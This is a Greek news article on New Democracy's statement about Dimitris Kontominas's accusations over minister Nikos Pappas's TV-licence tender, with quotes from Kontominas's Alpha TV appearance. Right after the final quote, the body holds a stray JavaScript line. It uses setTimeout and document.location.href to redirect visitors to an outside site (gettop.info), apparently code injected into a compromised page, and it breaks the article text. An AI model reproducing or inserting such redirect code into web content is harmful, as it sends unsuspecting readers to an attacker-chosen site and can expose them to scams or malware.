ΝΔ: Οι καταγγελίες του κ. Κοντομηνά επιβεβαιώνουν τη θέση της Νέας Δημοκρατίας για τον διαγωνισμό

0
4

 

«Οι καταγγελίες του κ. Κοντομηνά επιβεβαιώνουν τη θέση της Νέας Δημοκρατίας για τον διαγωνισμό – παρωδία, για τις τηλεοπτικές άδειες του Υπουργού – καναλάρχη κ. Παππά», αναφέρει σε ανακοίνωσή της η ΝΔ και προσθέτει:

«Για όλα αυτά – και για πολλά άλλα – ο κ. Παππάς ας ετοιμάσει την απολογία του στην Επιτροπή Θεσμών και Διαφάνειας της Βουλής, την προσεχή Παρασκευή».

O Δημήτρης Κοντομηνάς εμφανίστηκε σε μεσημεριανή εκπομπή του Alpha και αναφέρθηκε στον υπουργό Επικρατείας, λέγοντας: «Ο κύριος Παππάς θέλει να βάλει «μαύρο» στα κανάλια αλλά δεν θα τον αφήσουμε εμείς. Δεν μπορεί να βάλει «μαύρο» στα κανάλια ο Παππάς.

Ο Παππάς σκοτωνότανε μια ζωή, κάτι ψέματα λένε δεν μπορεί… είναι καλό παιδί. Αυτός σκοτώθηκε τόσο καιρό για την ΕΡΤ. Είναι δυνατόν αυτός που άνοιξε τρία κανάλια, να κλείσει άλλα τρία;».

Ο κ. Κοντομηνάς αναφέρθηκε και στον Γ. Καλογρίτσα, όταν είπε «Ήρθε και λέει «θα μου δώσετε το 51%», λέω τι άλλο θέλεις; Λέει «θέλω τέσσερις εκπομπές πολιτικές την εβδομάδα», τις έχω εγώ, καταλαβαίνετε για ποιον λέω. Αυτόν λέω που δεν είχε δεκάρα», ενώ συνέχισε την επίθεση στο Νίκο Παππά: «Και θα λέμε τις αλήθειες και δεν θα κλείσει κύριε Παππά, που ήσουνα στην Αμερική κι έφτιαξες και σενάρια ότι σε παρακολουθούσαμε εμείς. Αλλά κάτι κρύβεις εσύ, για να φωνάζεις, δεν ξέρω». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here